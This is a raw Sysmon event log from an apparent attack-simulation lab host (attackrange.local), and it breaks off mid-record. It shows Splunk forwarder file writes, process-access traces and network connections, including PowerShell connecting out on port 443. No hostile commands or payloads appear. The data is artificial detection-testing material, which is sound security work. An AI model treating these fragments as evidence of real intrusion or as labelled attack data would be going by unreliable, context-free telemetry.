23542300x800000000000000035342997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:22.816{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021B9C824056AC4A871E6BEF0C59CD0C,SHA256=C56315CAE6992C71D06E51E9EECA4CA468322C93D901B7E9E5B673496C046F32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:48.155{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52492-false10.0.1.12-8000- 23542300x800000000000000035342999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:23.834{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C4B40A81B11F38AA80C7E9BB86D2FC9,SHA256=8D997838DF8C25BCB10F16C42D30351ACB5069E022997A13ABC89D53FFC79AE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:23.097{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:24.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3716C793FD20DC6872DB2D5DE75C4C37,SHA256=B85E921E0104BB50B7017FD45C4D941459CC9CF5225E2F1970A7ED80448A9AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:25.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A4CC87D993165264CAF1370D807CD4A,SHA256=43E300674E7BE55594282028521EB0E84EEC01597A6CA3653A655A662FA74D67,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:50.838{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52494-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:50.084{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52493-false10.0.1.12-8089- 23542300x800000000000000035343001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:25.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EFA01AC02BE62131E362605DD33A9776,SHA256=CFE8017D2DBC5930A223416FC86D4C825ECCF891566074501D2E52D5F76D11D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:26.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C798011BB786FA4661B25D5B44870820,SHA256=1C56A9035A021CC931DFBD65C140BF75EE1EB135DA61F50593818E9E60C098F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:27.963{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45525386A6FD7DD1166224573EDF2F7F,SHA256=6C5BE1237A438DE398AFDE54485C41A981549CC1A0479FD0789DDFF62F31D0F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:53.216{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52495-false10.0.1.12-8000- 23542300x800000000000000035343008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:28.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44D4D2DEE67F072F491F4644A2C4F026,SHA256=EA3ADA8EAB00BB40DCBDC45948733668DA3C8A4F62F5D452289780BD1F3DA1E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:55.850{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52496-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:29.861{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7CFDB2AE69D1EC0F21888EE52880E2F3,SHA256=C99DE56EDF5D63A64D2A7582DF3E723B115262CD51C4BE89302CC38555B225B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:30.013{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C31A6B1A3CD484C15CE154F0EDA4865,SHA256=C521A40F339C96793B8BE43AF8CDA9AB71FD93C067FD47F4116AF6E285CAB72A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.843{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7387-613B-4AB4-03000000C801}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.843{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.843{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7387-613B-4AB4-03000000C801}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.843{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7387-613B-4AB4-03000000C801}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.828{B81B27B7-7387-613B-4AB4-03000000C801}6548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035343021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.343{B81B27B7-7387-613B-49B4-03000000C801}44686824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.143{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7387-613B-49B4-03000000C801}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.143{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.143{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.143{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.143{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7387-613B-49B4-03000000C801}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.143{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.143{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7387-613B-49B4-03000000C801}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.129{B81B27B7-7387-613B-49B4-03000000C801}4468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:31.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B77E7DE7E86EA59E354FE6328085B2,SHA256=8B31E84A0F704512A9CFAF068F68E912B5DCB466CF689054E162CB40A632D21C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.510{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7388-613B-4BB4-03000000C801}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:02:32.510{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 